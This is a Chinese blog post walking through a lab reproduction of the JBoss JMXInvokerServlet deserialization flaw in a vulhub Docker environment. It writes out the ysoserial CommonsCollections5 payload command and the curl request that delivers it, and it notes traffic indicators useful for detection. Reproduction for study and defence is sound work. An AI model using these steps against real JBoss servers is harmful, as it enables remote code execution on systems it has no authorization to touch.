JBoss JMXInvokerServlet 反序列化漏洞

漏洞原理:

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响版本:

  • JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
  • JBoss AS (Wildly) 6 and earlier
  • JBoss A-MQ 6.2.0
  • JBoss Fuse 6.2.0
  • JBoss SOA Platform (SOA-P) 5.3.1
  • JBoss Data Grid (JDG) 6.5.0
  • JBoss BRMS (BRMS) 6.1.0
  • JBoss BPMS (BPMS) 6.1.0
  • JBoss Data Virtualization (JDV) 6.1.0
  • JBoss Fuse Service Works (FSW) 6.0.0
  • JBoss Enterprise Web Server (EWS) 2.1,3

环境准备:

/vulhub/jboss/CVE-2017-12149

命令:docker compose up -d

靶机IP:10.168.10.129

攻击机:10.168.10.128

首次执行时会有1~3分钟时间初始化,初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。

漏洞利用:

访问 /invoker/JMXInvokerServlet 会出现下载文件的弹窗

说明接口开放,此接口存在反序列化漏洞

利用ysoserial,来生成payload,

下载链接:https://github.com/frohoff/ysoserial/releases

如果用kali生成payload报错可能是因为内置java版本过高,我是用wiindows下生成的(jdk8)

java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/testsuccess" >1.ser

生成1.ser可以拖进到ubuntu(攻击机)

发起攻击(同时用wireshark抓包):

curl http://10.168.10.129:8080/invoker/JMXInvokerServlet --data-binary @1.ser

攻击成功:

分析流量

响应头状态码为200,响应体存在关键字:ClassCastException

参考链接:

NucleiTP/CVES/critical/CVE-2017-12149.yaml at 19d2641e627c1e52f107821b9be2937eaf0989c8 · ExpLangcn/NucleiTP · GitHub

os:怎么现在CSDN的编辑做的跟shit一样,好难编辑啊

相关推荐
Mitch3112 天前
【漏洞复现】CVE-2023-37461 Arbitrary File Writing
web安全·网络安全·prometheus·metersphere·漏洞复现
摘星怪sec1 个月前
【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
网络安全·文件上传·漏洞复现
阿呆不呆@qq4 个月前
springblade-JWT认证缺陷漏洞CVE-2021-44910
cve·漏洞复现
网友小黑4 个月前
Tomcat常见漏洞复现
web安全·tomcat·漏洞复现
运维Z叔5 个月前
记一次因敏感信息泄露而导致的越权+存储型XSS
运维·前端·数据库·安全·渗透·xss·漏洞复现
凝聚力安全团队5 个月前
【漏洞复现】通达OA v2017 video_file.php 任意文件下载漏洞
web安全·web·漏洞·漏洞复现·web渗透
渗透测试老鸟-九青6 个月前
redis未授权访问漏洞复现
数据库·redis·缓存·漏洞复现
凝聚力安全团队6 个月前
【漏洞复现】海康威视 综合安防管理平台软件 center_api_files 任意文件上传漏洞
web安全·网络安全·渗透测试·web·漏洞·漏洞复现